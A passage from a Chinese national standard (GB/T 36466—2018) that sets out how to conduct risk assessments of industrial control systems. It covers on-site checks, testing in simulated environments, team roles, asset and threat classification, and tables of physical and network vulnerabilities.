以下几种情况可能需要使用现场核查: a) 对工业控制系统现场物理环境评估; b) 对工业控制系统配置、系统架构和系统日志等评估; c) 对工业控制系统安全管理评估; d) 对已采取安全措施进行确认。 实施指南如下: a) 评估方需将需要现场核查的测试项与工业控制系统现场生产管理、操作人员进行沟通,制定现 场核查计划安排。如果工业控制系统分布区域很大,涉及多个部门,需提前做好计划安排,统 筹时间和人员等; b) 对于部分工业控制系统所在的现场环境恶劣的情况,应严格遵守被评估方现场规章制度;必 要时,在进入工业控制系统现场前,被评估方可组织评估人员进行安全教育培训,保障人员的 安全; c) 评估方核查工业控制系统的访问控制、审计等功能时,需工业控制系统的现场生产管理、操作 人员和相应的信息安全人员在场,最好由工业控制系统操作人员对其进行核查操作,评估人员 只负责查看并记录结果; d) 现场核查测试时,评估方不应改动工业控制系统的任何配置; e) 记录现场核查的结果。若发现不符合项或脆弱项,需对其进行验证。 5.5 现场测试 工业控制系统分为离散型和连续型。某些离散的工业控制系统,如数控机床等,处于非运行状态时 可以进行现场测试。现场测试是指直接在待评估工业控制系统现场环境上进行安全性测试,这种测试 方法能够更真实的反应工业控制系统存在的脆弱性。现场测试方法包括漏洞扫描、协议分析、设备漏洞 挖掘、渗透性测试等。 渗透性测试的目的是为发现和确认工业控制系统的脆弱性,可在被评估方允许的前提下对离散过 程的工业控制系统实施。测试前应与相关专家讨论具体的实施方案和评估可能产生的后果,并制定相 应的处置计划。评估方应谨慎使用渗透性测试方法。 现场测试完成后,需要对系统进行验证才能再次投入使用。 5.6 模拟仿真环境测试 连续型工业控制系统往往处于不间断运行状态,任何系统故障都可能造成巨大的损失。风险评估 过程中脆弱性识别往往需要进行攻击测试或绕过系统的安全机制,若直接在生产系统上实施会带来更 大的安全风险,甚至导致工业控制系统崩溃或进入不可控状态。因此需要搭建模拟仿真测试环境并在 此基础上进行安全测试工作。由于测试工作仅在模拟环境中进行,不会对现场工业控制系统的正常运 行造成影响。模拟仿真环境下的测试评估是最有效的测试评估方法,能够在更大的范围内发现被测试 系统内的流程、协议、实现等安全漏洞。 模拟仿真测试评估在测试过程中可能会造成被测试设备的损坏,或导致被测试系统的数据库中产 生无效数据。若使用工业控制系统的开发、测试或备用系统作为模拟仿真测试环境,在测试完成后需要 经过验证才能将其投入使用,以承担其原本的功能。 模拟仿真测试最常用的技术测试方法包括:渗透测试、固件逆向分析、专用嵌入式系统分析、源代码 审计、程序的上传下载漏洞分析、专有协议分析、硬件板卡分析等。常用的检测工具包括漏洞扫描器,渗 透性测试工具,通讯协议数据捕获工具等。 在模拟仿真环境中既可对整个系统的安全性进行测试,评估系统整体安全状况,也可针对重要设备 进行单独的组件测试,以识别工业控制系统的关键风险。 6 实施过程 6.1 准备 6.1.1 概述 风险评估的准备是整个风险评估过程有效性的保证。评估方与被评估方都应充分做好风险 评估实施前的各项准备工作。为保障风险评估工作的顺利开展,应召开风险评估工作启动会议, GB/T31509—2015 规定了启动会议的内容及意义。 6.1.2 确定目标 风险评估应贯穿于工业控制系统生命周期的各阶段中,由于工业控制系统生命周期各阶段中风险 评估实施的内容、对象、安全需求均不同,因此评估方应首先根据当前工业控制系统的实际情况来确定 在工业控制系统生命周期中所处的阶段,并以此来明确风险评估目标,如图5所示。具体实施过程见 GB/T 20984—2007以及 GB/T 31509—2015。 实施指南如下: a) 评估方应根据输入的文档材料及对相关人员的访谈,分析研判出工业控制系统现在所处的生 命周期; b) 根据生命周期不同阶段的要求确定评估目标。 6.1.3 确定范围 风险评估实施范围是评估方工作的范围。评估范围可以是包括生产管理层和企业资源层在内的整 个工业控制系统,也可以是工业控制系统中特有部分或关键业务处理系统等。在确定评估范围时,应结 合评估目标以及工业控制系统的实际建设运行情况合理的确定评估范围边界。确定评估范围为: 输入 1.评估月标 2.主要业务 3.组织要求的评估范围 4.与评估目标相关的资产 5.组织管理权限 6.评估对象实际建设情况 方法 l. 文档查阅 2.组织要求 3.沟通交流 输出 评估范围 1.业务逻辑边界 2.网络及设备载体边界 3.物理环境边界 4.组织管理权限边界 实施指南如下: a) 评估方应了解工业控制系统所处的工业控制安全基线级别,具体见GB/T32919—2016; b) 评估方应了解被评估方要求评估的范围和实际工业控制系统建设情况; c) 风险评估实施范围应包括被评估方工业控制系统相关的资产、管理机构,关键业务流程等; d) 评估方应结合已确定的评估目标、被评估方要求评估的范围和实际工业控制系统建设情况, 合理定义评估对象和评估范围边界。 6.1.4 组建团队 风险评估实施团队可由评估方与被评估方的风险评估实施组、专家组共同组成。评估方应由工业 控制系统专业人员、信息技术评估人员等组成。 一个运行的工业控制系统会涉及多个利益相关方,包括 提供工控产品的厂商、实际销售工控产品的分销商、集成并开发应用系统的集成商、为系统提供运行维 护的厂商以及工控系统的所有者等。在进行工业控制系统的风险评估之前,需要清晰界定评估所针对 的是工控系统生态的哪一部分,涉及哪些利益相关方,从而确定风险评估过程中被评估方应当邀请的参 与人员。 评估实施团队应进行风险评估技术培训和保密教育,制定风险评估过程管理相关规定。评估方与 被评估方应签署保密协议。 每个团队成员应具有明确的职位和责任。为确保风险评估实施工作的顺利有效进行,应采用合理 的项目管理机制, 评估方人员职位 工作职责 项目组长 是风险评估项目中实施方的管理者、责任人,具有丰富的工业控制系统风险评估经验。具体 工作职责包括: 1)GB/T 31509—2015规定的; 2)参与风险评估启动会议; 3)组织开展风险评估方案专家评审会; 4)组织开展风险评估报告等项目成果物专家评审会; 5)组织评估方成员开展保密教育及相关技术培训; 6)参与项目验收会议; 7)配合搭建模拟仿真测试环境 评估人员 是负责风险评估项目中技术方面评估工作的实施人员,应熟悉工业控制系统专用的通信协议 (例如:DNP3、ModBus、PROFINET、PROFIBUS等);同时应精通编码、逆向工程、协议分析和 渗透测试等;部分工业控制系统使用非桌面操作系统,评估实施团队成员应熟悉被检测工业 控制系统使用的操作系统。具体工作职责包括: 1)GB/T 31509—2015规定的; 2)参与保密教育及相关技术培训 质量管控员 是负责风险评估项目中质量管理的人员。具体工作职责包括: 1)GB/T 31509—2015规定的; 2)参与保密教育及相关技术培训 被评估方 人员职位 工作职责 项目组长 是风险评估项目中被评估方的管理者。具体工作职责包括: 1)GB/T 31509—2015规定的; 2)组织被评估方成员开展保密教育及相关技术培训; 3)组织召开风险评估启动会议; 4)组织开展项目验收会议; 5)组织搭建模拟仿真测试环境 项目协调人 是指风险评估项目中被评估方的工作协调人员,应被赋予一定权力。具体工作职责包括: 1)GB/T 31509—2015规定的; 2)参与保密教育及相关技术培训; 3)参与风险评估启动会议; 4)配合搭建模拟仿真测试环境 信息安全管理人员 是指被评估方的专职信息安全管理人员。在风险评估项目中的具体工作职责包括: 1)GB/T 31509—2015规定的; 2)参与保密教育及相关技术培训; 3)配合搭建模拟仿真测试环境 运维及操作人员 是指在被评估方的工业控制系统运行维护及操作人员。运维及操作人员承担工业控制系统 中的现场控制层及现场设备层的管理运维及使用。在风险评估项目中的具体工作职责包括: 1)GB/T 31509—2015规定的; 2)参与保密教育及相关技术培训; 3)配合搭建模拟仿真测试环境 关键产品供应商人员 是指工业控制系统关键产品(包括软硬件)供应商人员代表。在风险评估项目中的具体工作 职责包括: 1)在项目组长的安排下,配合评估方的工作; 2)参与保密教育培训; 3)参与风险评估项目的验收 系统集成商人员 是指工业控制系统的集成商代表,在风险评估项目中具体的工作职责包括: 1)在项目组长的安排下,配合评估方的工作; 2)参与保密教育及相关技术培训; 3)配合搭建模拟仿真测试环境; 4)参与对风险评估项目的验收 专家组由工业控制系统相关领域专家组成,职责包括: a) 对风险评估实施方案进行评审; b) 对风险评估报告等项目成果物进行评审; c) 对评估工作中出现的关键性问题提供指导; d) 对风险评估整个过程进行监督。 系统调研 系统调研是熟悉了解被评估对象的过程,风险评估组应进行充分的系统调研,修正评估目标跟范 围,同时为风险评估依据和方法的选择、评估内容的实施奠定基础。评估方对工业控制系统进行调研可 采取文档查阅、资料收集、现场交流和现场查看等方式进行。 输入 1.业务战略及管理制度 2.业务功能和要求 3.网络结构与网络环境 4.系统边界 5.主要的硬件、软件 6.数据和信息 7.系统和数据的敏感性 8.系统操作人员 9.系统运维记录及日志 方法:1.文档查阅 2.现场沟通交流 3.资料收集 输出:调研报告 实施指南如下: a) 评估组针对工业控制系统与系统运维、系统操作、关键产品供应商等相关人员进行交流,了解 其承担的业务、网络结构、系统边界等。 b) 评估组查看其设计、使用说明等文档: 1) 在工业控制系统中,若现场设备及其应用软件非被评估方自己开发,评估组需仔细审查 供应商提供的所有资料,并与供应商取得联系,以便评估实施时可以进行技术沟通; 2) 查看工业控制系统的安全需求及对应工业控制系统所处安全控制基线级别,采取哪些工 业控制系统安全措施。 c) 评估组现场核查工业控制系统的物理环境、操作过程、设备组成等方面的信息并进行资料 收集。 d) 评估组根据现场调研整理调研结果,编写调研报告。 6.1.6 制定评估方案 风险评估方案是评估工作实施活动总体计划,用于管理评估工作的开展,使评估各阶段工作可控, 并作为评估项目验收的主要依据之一。风险评估方案应得到被评估方的确认和认可。风险评估方案的 内容应包括(但不仅限于): a) 风险评估工作框架:包括评估目标、评估范围、评估依据、评估工具等,其中评估依据和评估工 具可根据 GB/T 31509—2015来确定; b) 评估团队:包括评估组成员、组织结构、角色、责任; c) 评估工作计划:包括各阶段工作内容和工作形式; d) 评估环境要求:根据具体的评估方法选取相应的评估环境,包括工业控制系统现场环境,工业 控制系统开发和测试环境,模拟仿真测试环境; e) 风险规避:包括保密协议、评估工作环境要求、评估方法、工具选择、应急预案等; f) 时间进度安排:评估工作实施的时间进度安排。 6.1.7 搭建模拟仿真测试环境 被评估方应根据测试方案的需要,搭建合适的模拟仿真测试环境。模拟仿真测试环境搭建需保证 与现场工业控制系统的一致性,主要体现在以下5个方面: a) 现场控制层设备、过程监控层设备、网络边界设备,包括其品牌、型号、固件、配置、开启的服 务等; b) 关键软件,包括其厂商、版本号、补丁、配置等; c) 通讯协议; d) 系统架构及网络架构; e) 模拟仿真测试环境的规模不必与实际系统相同。 若被评估方存在工业控制系统的开发、测试环境,评估方需对其进行评判,满足模拟仿真环境的要 求后方可在其中进行进一步的测试评估工作。 6.2 资产评估 6.2.1 资产评估概述 资产是对被评估方具有价值的信息或资源,是安全策略的保护对象。资产价值是资产重要程度或 敏感程度的表征。资产评估包括识别资产和评估资产价值2个方面内容。 6.2.2 资产分类 在一个组织中,资产有多种存在形式。不同类别的资产重要性不同,面临的威胁也不同。对工业控 制系统及相关的资产进行分类可以提高资产识别的效率。在实际工作中,具体的资产分类方法可以根 据具体的评估对象和要求,由评估方灵活把握。根据资产的表现形式,可将资产分为软资产、硬资产和 人力资产等 软资产 系统软件:操作系统、数据库管理系统、开发系统等; 应用软件:远程拨号软件、OPC、办公软件、数据库软件、远程控制软件、工业控制系统组态软件、工业控 制系统相关开发软件、各类工业控制系统工具软件等; 源程序:各种共享源代码、自行或合作开发的各种代码、工业控制系统定制开发流程代码、现场设备固 件 等 ; 工业控制系统专有协议:CAN、MODBUS、PROF IBUS、MP I、PPI、PROF IN ET、OPC、DNP3 .0、 Foundation Fieldbus、LonWorks、HART和工业以太网等; 通用协议:FTP、TFTP、HTTP、DNS、SNMP、Telnet等; 数据:保存在信息媒介上的各种数据资料,包括源代码、实时数据库数据、历史数据库数据、系统文档、 系统日志、运行管理规程、计划、报告、用户手册、各类文档等 硬资产 现场控制层设备:IED、DCS、PLC、RTU等; 网络设备:工业控制系统协议转换器、路由器、网关、交换机、调制解调器等; 安全设备:工业防火墙、入侵检测系统、网闸、VPN等; 计算机设备:服务器、工作站、台式计算机、便携计算机、HMI等; 存储设备:磁带机、磁盘阵列、磁带、光盘、软盘、移动硬盘等; 传输线路:光纤、双绞线、无线、CAN总线、MODBUS、PROFIBUS专用工业控制系统总线等; 保障设备:UPS、变电设备、空调、保险柜、文件柜、门禁、消防设施等 人力资产 掌握重要信息和核心业务的人员:信息安全人员、工业控制系统设计人员、集成人员、关键设备供应商、 操作人员、运维人员等 6.2.3 资产调查 资产调查是识别被评估方工业控制系统中资产的重要途径。资产调查一方面应识别出有哪些资 产,另一方面要识别出每项资产自身的关键属性。工业控制系统结构复杂,资产繁多,为保证风险评估 工作的进度要求及质量要求,有时不能对所有资产进行全面分析,应选取其中关键的资产进行分析 输入:1.规划书 2.设计方案 3.实施方案 4.用户手册 5.测试报告 6.管理制度文件 7.资产清单 8.网络拓扑图 9.制度落实的记录文件 10.系统相关人员 11.评估范围 方法:1.文档查阅 2.现场核查 3.现场访谈 1.资料收集 输出:1.评估资产清单 2.关键资产 协议也属于系统资产。工业控制系统广泛使用私有协议,往往会出现许多安全问题。资产调查过 程中,应识别出工业控制系统使用的通讯协议并对其进行评估。 实施指南如下: a) 评估组根据评估目标和范围,确定风险评估对象,并梳理其基本信息,可以参照附录A 中表A.1 进行访谈; b) 评估方根据被评估方提供的规划书、设计方案、用户手册等文档并结合现场访谈相关人员识 别出工业控制系统的具体业务; c) 评估方根据工业控制系统的业务并结合现场访谈相关人员,识别出工业控制系统的工艺需求 以及安全需求; d) 评估方根据工业控制系统的工艺需求和安全需求,结合现场访谈相关人员,识别出关键功能 需求及安全需求; e) 评估方根据识别的关键需求、被评估方提供的资产清单、网络拓扑图等识别出工业控制系统的 关键资产。 6.2.4 资产分析 根据工业控制系统承担的业务,判断资产的可用性、完整性和保密性的优先级。通常工业控制系统 将可用性作为首要需求。 进行资产赋值时可以参考如下因素: a) 工业控制系统的重要性以及安全等级; b) 资产对工业控制系统正常运行的重要程度; c) 工业控制系统信息安全对资产的依赖程度; d) 资产可用性、完整性、保密性对工业控制系统以及相关业务的重要程度。 分析资产的可用性、完整性、保密性安全属性的等级,并参考对可用性、完整性、保密性赋值,经过综合 评定得到资产的最终赋值结果,如图10所示。将资产价值分为5个等级,具体含义见GB/T20984—2007。 实施指南如下: a) 根据系统承担的业务,分析研判资产的安全属性可用性、完整性和保密性的优先级; 一般情况 下,工业控制系统会将可用性放在首位; b) 根据资产调查以及资产赋值结果,确定重要资产的范围,并主要围绕重要资产进行下一步的 风险评估。 6.3 威胁评估 6.3.1 威胁评估概述 威胁是指可能导致危害系统或被评估方的不希望事故的潜在起因。威胁是客观存在的,不同的资 产面临威胁不同,同一个资产不同威胁发生的可能性和造成的影响也不同。全面、准确地识别威胁有利 于做好防范措施。威胁评估要识别出威胁源、威胁途径及可能性和威胁影响,并对威胁进行分析赋值。 6.3.2 威胁分类 威胁源是产生威胁的主体。不同的威胁源具有不同的攻击能力,在进行威胁调查时,首要应识别存 在哪些威胁源,同时分析这些威胁源的动机和能力。攻击者的能力越强,攻击成功的可能性就越大。衡 量攻击能力主要包括:施展攻击的知识、技能、经验和必要的资金、人力和技术资源等。表4列出了工业 控制系统通常面临的威胁来源。 基于威胁源的威胁分类: 环境因素 环境因素包括断电、静电、灰尘、潮湿、温度、鼠蚁虫害、电磁干扰、洪水、火灾、地震、意外事故 等环境危害或自然灾害等;除了自然灾害等不可抗因素,来自环境因素的威胁基本上可以通过加强保障能力来抵御 内部 误操作 误操作是由于内部人员缺乏责任心、不关心或者不关注,没有遵循规章制度和操作流程,缺乏 培训,专业技能不足等导致的工业控制系统故障或被攻击 内部 有意破坏 有意破坏是由对被评估方不满或具有某种恶意目的的内部员工对工业控制系统进行破坏或 窃取系统信息; 内部人员了解系统状况并具有一定的访问权限,可以物理接触系统、掌握系统的关键信息。 进行有意破坏不需要掌握太多入侵知识就可以破坏系统或窃取系统数据 外部攻击 外部攻击是外部人员或组织对系统进行的攻击。外部攻击者难以接触系统,应具备一定的资 金、人力、技术等资源。不同的攻击者能力差异较大 供应链 供应链包括对被评估方提供硬件、软件、服务等的制造商及生产厂,可能在提供的软硬件设备 上设置“后门”来达到方便维护人员调试或窃取系统信息等目的 工业控制系统可能存在的威胁:灾难 自然灾难使工业控制系统的一个或多个组件停止运行,例如地震、火灾、洪水或其他未预期的 事故 停电 自然灾难,恶意或无恶意的个人引起的停电事故,影响工业控制系统一个或多个组件的运行 非法信息披露 无权限者进行攻击(嗅探,社会活动),以获得储存在工业控制系统组件中的敏感信息 非法分析 无权限者进行攻击(嗅探,社会活动),用于分析受保护的敏感信息 非法修改 无权限者进行攻击(修改,旁路,嗅探),以修改存储于工业控制系统组件中的敏感信息 非法破坏 无权限者进行攻击(破坏,旁路),以破坏存储于工业控制系统组件中的敏感信息 篡改控制组件 通过以下攻击(修改,旁路,物理攻击),工业控制系统组件被恶意的人员篡改 错误操作 合法操作员意外的发布错误指令或进行错误配置,导致受控工业控制系统过程和组件被破坏 冒充合法用户 无权限者进行攻击(嗅探,欺骗,社会活动),以获得存储于工业控制系统组件中的用户凭证, 冒充合法用户 抵赖 合法用户否认在工业控制系统交互式系统中已执行的错误操作 拒绝服务 无权限者进行攻击(破坏,DOS),使工业控制系统组件在一段时间内无法使用,达到系统拒绝 为合法用户提供服务的目的 提升权限 无权限者进行攻击(错误操作,嗅探,欺骗,社会活动),以获得存储于工业控制系统服务器组 件中的用户凭证,提升工业控制系统组件访问的权限,达成恶意目的 故障检测缺失 操作员错误操作和安全违规的系统故障,在工业控制系统交互式系统中,执行的日常任务没 有被检测和审计,以作进一步的分析和修正 病毒感染 个人恶意或无意地将病毒传入工业控制系统网络,恶意代码造成不必要的系统停机和数据 腐败 非法物理存取 无权限者进行一次物理攻击,以实现对受保护工业控制系统组件的物理存取 6.3.3 威胁调查 6.3.3.1 概述 工业控制系统网络化、系统化、自动化、集成化的不断提高,尤其是互联网技术进入工业控制领域, 信息系统与工业控制系统的集成,其面临的安全威胁日益增长。威胁调查就是要识别被评估方工业控 制系统中可能发生并造成影响的威胁,进而分析哪些威胁发生的可能性较大、可能会造成重大影响 工业控制系统大多部署网闸设备,在工业控制网络和外部网络之间进行网络隔离。威胁调查中要 着重识别针对网闸等网络隔离设备的威胁。 评估组将被评估的工业控制系统所处的自然环境、相关管理制定策略、资产清单、网络拓扑图、故障 记录等文件进行汇总,对系统相关人员进行访谈,以识别工业控制系统威胁,如图11所示。 实施指南如下: a) 评估方通过查看系统日志,分析系统面临的威胁; b) 评估方可参考被评估方内其他工业控制系统面临的威胁来分析本系统所面临威胁; c) 评估方可收集一些第三方组织发布的安全态势方面的数据; d) 若系统运行过一段时间,可根据以往发生的安全事件记录,分析系统面临的威胁。例如,系统 维修频率,系统受到病毒攻击频率,系统不可用频率,系统遭遇黑客攻击频率等。 6.3.3.2 威胁途径及可能性 威胁途径是指威胁源对工业控制系统或信息系统造成破坏的手段和路径。威胁源对威胁客体造成 破坏,有时候并不是直接的,而是通过中间若干媒介的传递,形成一条威胁路径。在风险评估工作中,调 查威胁路径有利于分析各个环节威胁发生的可能性和造成的破坏。 威胁是客观存在的,但对于不同的被评估方和工业控制系统,威胁发生的可能性不尽相同。威胁发 生的可能性与威胁途径、攻击能力、动机、工业控制系统的脆弱性、保障能力是密切相关的。例如,当威 胁需要物理接触设备时,其可能性会大大降低。 实施指南如下: a) 评估方统计以往安全事件报告中出现过的威胁及其频率; b) 评估方统计现场工业控制系统中通过检测工具以及各种日志发现的威胁及其频率; c) 统计国际组织发布的关于该工业控制系统及其组件面临的威胁及其频率; d) 确定不同威胁的频率值; e) 非人为威胁途径表现为发生自然灾难、出现恶劣的物理环境、出现软硬件故障或性能降低等; f) 人为的威胁途径表现为嗅探、重放、拒绝服务、误操作等; g) 调查威胁攻击路径,要明确威胁发生的起点、威胁发生的中间点以及威胁发生的终点,并明确 威胁在不同环节的特点,确定威胁路径; h) 根据威胁途径、攻击能力等判断威胁发生的可能性。 6.3.3.3 威胁的影响 威胁出现的频率是衡量威胁严重程度的重要要素,因此威胁识别后需要对发生频率进行赋值,以代 入最后的风险计算中。 威胁客体是威胁发生时受到影响的对象,威胁影响跟威胁客体密切相关。当一个威胁发生时,会影 响到多个对象。威胁客体有层次之分,通常威胁直接影响的对象是资产,间接影响到工业控制系统和 组织。 实施指南如下: a) 识别那些直接受影响的客体,再逐层分析间接受影响的客体; b) 确定威胁客体的价值,其价值越大,威胁发生的影响越大; c) 确定客体范围,其范围越广泛,威胁发生的影响越大; d) 受影响客体的可补救性也是威胁影响的一个重要方面。遭到威胁破坏的客体,有的可以补救 且补救代价可以接受,威胁发生的影响较小;有的不能补救或补救代价难以接受,威胁发生的 影响较大。 6.3.4 威胁分析 在调查威胁的基础上,识别威胁发生的概率、威胁影响,分析并确定计算威胁值的方法并对其进行 赋值。威胁分析实施见 GB/T 31509—2015。 6.4 脆弱性评估 6.4.1 脆弱性评估概述 脆弱性是资产自身存在的,威胁总是要利用资产的脆弱性才可能造成危害。评估方应考虑工业控 制系统脆弱性具有难以修复、原则上需要保密的特点,从物理环境、网络、平台和安全管理4个方面对工 业控制系统脆弱性进行评估。 脆弱性评估分为脆弱性识别与脆弱性分析赋值两个环节。脆弱性识别的依据可以是国际标准或国 家安全标准,也可以是行业规范、应用流程的安全要求。对应用在不同环境中相同的脆弱点,其脆弱性 严重程度是不同的,评估者应从被评估方安全策略的角度考虑、判断资产的脆弱性及其严重程度。 工业控制系统以往风险评估报告、审计说明、安全需求、安全测试结果、系统所处的安全等级、被评 GB/T 36466—2018 估方计划实施的安全措施、评估范围、常见脆弱性、依据国际或国家安全标准等均可作为评估方评估的 资料。评估方通过资料收集、文档查阅、现场访谈、现场核查、模拟仿真环境测试等方法识别工业控制系 统存在的脆弱性,如图12 所示。 实施指南如下: a) 评估方通过现场访谈和现场核查的方式对物理环境脆弱性进行识别,具体识别过程见6.4.2; b) 评估方通过现场访谈、现场核查等方式对网络脆弱性进行识别,具体识别过程见6.4.3; c) 评估方通过现场访谈、现场核查、模拟仿真环境测试的方式对平台脆弱性进行识别,具体识别 过程见6.4.4; d) 评估方通过文档查阅、现场访谈和现场核查的方式对安全管理脆弱性进行识别,具体识别过 程见6.4.5。 6.4.2 物理环境脆弱性识别 物理环境脆弱性识别主要识别工业控制系统物理环境的安全风险,包括场所环境、电磁环境、设备 实体、线路等方面。评估方核查已采取物理环境的安全措施及验证其已采取的安全措施有效性,同时查 看基于该安全控制级别缺少哪些安全措施。 实施指南如下: a) 评估方文档查阅及访谈被评估方相关人员确定工业控制系统所处的安全控制基线级别,参考 系统所处级别应采取的安全措施,查看系统是否存在明显不符的脆弱性; b) 评估方现场核查所在的场所建筑物是否坚固,是否存在易于闯入的任何缺口,所有外部门是 否使用控制机制来保护,防制未授权进入,采用哪些安全措施,验证核实已采用措施的有效性; c) 工业控制系统所在场所、办公室、公共访问接待区是否交叉,有无安全保卫人员,有无监控装 置等: d) 评估方现场核查工业控制系统所在场所与办公室和公共访问接待区有交叉的建筑物是采用 何种方式的物理访问控制,并核实其采取的安全措施的有效性。例如门禁、身份标识、访客人 员登记、专人陪同、不准携带移动介质、相机等管理措施; e) 评估方查看工业控制系统所在场所是否安装避雷针、安装通风装置、配备灭火器、配备应急电 源、远离易燃易爆物品、建筑物漏水渗水等; f) 评估方查看工业控制系统场地是否处于复杂的电磁环境,内部电磁信息是否泄漏; g) 网络节点中心、网络设备、安全防护设备、办公设备、工作站、服务器和现场设备等设备安放位 置是否合适、是否将需要专门保护的组件隔离放置等; h) 光缆、电缆、网络线缆等线路是否在地下布线,且将电源电缆与通信电缆分开布线,电缆设备 标识是否清晰。 物理环境脆弱性:系统所在场所建筑物无物理屏 障或访问控制机制 场所外墙应够坚固,外部的门应使用控制机制保护,例如,身份识别仪器、门禁系 统、锁、报警器等,若无物理屏障可导致未授权人员可以进入系统所在场所 系统所在场所建筑物未安装安 防监控系统 应在系统所在场所建筑物安装安防监控系统,防制设备和信息被盗,造成信息 泄漏 系统无应急电源 系统应配备应急电源,防制断电对设备的损坏及数据丢失造成损失 系统无应急开关 系统应配备应急开关以便紧急情况快速切断电源 未安装加热/通风、空调等支持 系统 需安装加热/通风、空调等支持系统,保证工业控制系统工作环境的稳定 自然灾害 火灾、洪水、地震、雷电和地震等自然灾害引起破坏时,应能备份系统数据,远离易 燃易爆材料,配备适当的灭火器 缺少访问登记机制 第三方人员及临时授权人员进入系统场所时应有访问登记记录,防制未授权进入 系统处于复杂电磁环境内 应避免系统暴露于强电磁场等有较强电磁干扰的环境内 6.4.3 网络脆弱性识别 6.4.3.1 网络结构及网络边界脆弱性识别 网络结构及网络边界脆弱性是指工业控制系统网络结构及网络边界存在的脆弱性。表7列出了通 常工业控制系统可能存在的网络结构和网络边界脆弱性。 表 7 工业控制系统网络结构和网络边界脆弱性 脆弱性 描述 工业控制系统网络未分层 被评估方设计实施时未对工业控制系统网络进行分层隔离,可能会导致部分设备 出现的安全问题弥散到整个工业控制系统网络中 薄弱的网络安全架构 因业务和操作需要对工业控制系统网络架构的开发和修改,可能在不经意间将安 全漏洞引入网络架构的某一部分中 企业资源层网络与工控网络中 未部署逻辑隔离设备 网络之间未部署网络隔离设备,可直接通信。攻击数据包和恶意软件在网络之间 传播,可轻易监测到其他网络上的敏感数据,造成未经授权的访问 使用双宿主机 双宿主机可以导致数据在两个网络之间传输,若没有适当安全措施的双宿主机将 会造成额外的威胁 在控制网中传输非控制数据 控制数据与非控制数据有着不同的要求,比如可靠性程度不同,因此在同一个网 络中传输两种流量会导致难以配置网络。例如,非控制流量可能会大量损耗控制 流量传输所需要的网络带宽资源,导致工业控制系统的系统功能中断 在控制网络中应用IT网络服务 IT网络中使用的服务,如DNS、DHCP、HTTP、FTP、SMTP等,在控制网络中被使 用时,可能引入额外的严重安全漏洞 非法的数据流向 控制网络的数据 重要网络链路或设备没有冗余 配置 在重要的网络中没有冗余备份链路,可能导致设备遭遇单点故障 安全边界定义不清晰 控制网络边界定义不清晰,将难以保证必要的安全措施被合适的实施或配置,会 导致对系统和数据的未授权的访问和其他问题 设备MAC地址未绑定 设备的MAC地址未绑定,容易遭到中间人攻击 边界防护设备访问控制措施 不当 缺少或未配置合适的边界防护控制措施会导致无用数据在网络间传递。这会引 起多种问题,如攻击和病毒在网络中扩散,可以在其他网络中对控制网中敏感数 据进行监控和窃听及对系统进行非法访问等 网络设备日志未开启 如果没有合适、详细的日志信息,将无法分析出导致安全事件发生的原因 未部署安全监控设备 如果不进行定期的安全监控,事故可能被忽视,将可能导致额外的破坏或中断 核查网络结构和网络边界脆弱性,以及被评估方采取的安全措施的有效性。 实施指南如下: a) 查看网络拓扑图及现场核查工业控制系统网络结构是否分层,各层之间是否部署访问控制设 备、入侵检测设备、安全隔离设备、安全审计设备和防护设备等,未部署上述设备的网络是否有 其他措施替代; b) 现场核查企业资源层网络与工控网络中是否部署逻辑隔离设备,如防火墙等; c) 现场核查工业控制系统部署访问控制设备、入侵检测设备、安全隔离设备、安全审计设备和防 护设备等的配置,并验证其配置有效性,分析这些设备的日志;评估方可根据GB/T 32919— 2016中附录B 中 B.16和 B.17 进行评估; d) 现场核查工业控制系统是否使用远程通信,是否使用访问控制措施; e) 现场核查边界防护设备的访问控制措施配置是否合适; f) 在模拟仿真环境中对是否存在通过侵入远程设备进而控制部分或整个工业控制系统的风险进 行测试分析: g) 查看工业控制系统网络运维记录或日志,记录网络中曾出现过的故障及原因; h) 工业控制系统网络与办公网之间的接入点数量是否严格控制,接入口是否进行安全管理和安 全防护; i) 查看网络中是否存在双宿主机使用情况; j) 查看设备 MAC 地址是否绑定; k) 评估方查看工业控制系统网络是否部署组织企业管理级应用,是否在控制网络中传输非控制 数据; 1) 评估方在模拟环境测试中抓取网络数据,并分析控制数据、口令等是否加密。并在模拟仿真环 境进行 DOS 攻击,验证是否存在非控制流量大量损耗控制流量传输所需要资源,导致工业控 制系统的系统功能中断的脆弱性; m) 评估方现场核查工业控制系统网络中是否有冗余链路和设备; n) 评估方查看控制网络中是否应用IT 网络服务,例如 DNS、DHCP、FTP、Telnet、SMTP、 SNMP 等; o) 评估方根据工业控制系统使用的服务应用,在模拟仿真环境中进行 DNS 劫持,ARP 欺骗,获 取远程登录密码,发送恶意软件等测试,验证在控制网络中使用IT 网络服务应用存在脆弱性; p) 评估方查看网络拓扑图及现场核查其网络,并在实验室中进行跨VLAN 攻击,验证被评估方 划分 VLAN 合理性及安全性; q) 评估方现场对系统网络的边界完整性进行核查。 6.4.3.2 网络设备脆弱性识别 网络设备脆弱性是指工业控制系统网络设备存在的脆弱性,表8列出了工业控制系统的网络设备 通常可能存在的脆弱性。 工业控制系统网络设备脆弱性:网络设备物理保护不足 应对网络设备的物理访问进行控制,以防止破坏网络设备 不安全的物理端口 不安全的通用接口如USB、PS/2等外部接口可能会导致未授权的设备接入 无关人员物理访问网络设备 对网络设备进行不当的物理访问会导致: 数据和硬件窃取; 数据和硬件的物理损伤破坏; 对网络安全环境(比如,修改ACL允许攻击进入网络)的篡改; 未授权的阻止或控制网络行为; 关闭物理数据链路 没有使用数据流控制 未采用数据流控制机制,如利用访问控制列表(ACL),限制系统或人对网络设备 的直接访问 IT安全设备配置不当 使用缺省配置往往导致主机上运行了不必要的开放端口和可能被威胁所利用的 网络服务。不当的防火墙配置规则和路由器访问控制列表将允许不必要的流量 通过 网络设备配置未备份 没有制定和实施网络设备配置备份和恢复规程,偶然或者恶意对网络设备配置进 行修改造成系统通信中断时无法及时恢复 口令未加密传输 以明文传输的口令很容易被攻击者窃听,攻击者会利用这些口令对网络设备进行 非法访问。通过这种访问,攻击者可以破坏工业控制系统的系统操作或者监视工 业控制系统系统网络行为 网络设备口令长期未更改 口令应定期更换,这样,即使未授权用户获得密码,也只有很短的时间段内可以访 问网络设备。未定期更换密码可能使黑客破坏工业控制系统的操作或监视器工 业控制系统的网络活动 采用的访问控制不足 通过非法访问网络设备,攻击者可以破坏工业控制系统的系统操作或者监视工业 控制系统网络行为 专用工业控制系统协议转换设 备采用默认设置 将工业控制系统网络中总线协议转换为以太网协议进行数据传输,该设备多为专 用设备,管理人员对其内部知之甚少,多采取出厂默认设置,存在一定安全风险 实施指南如下: a) 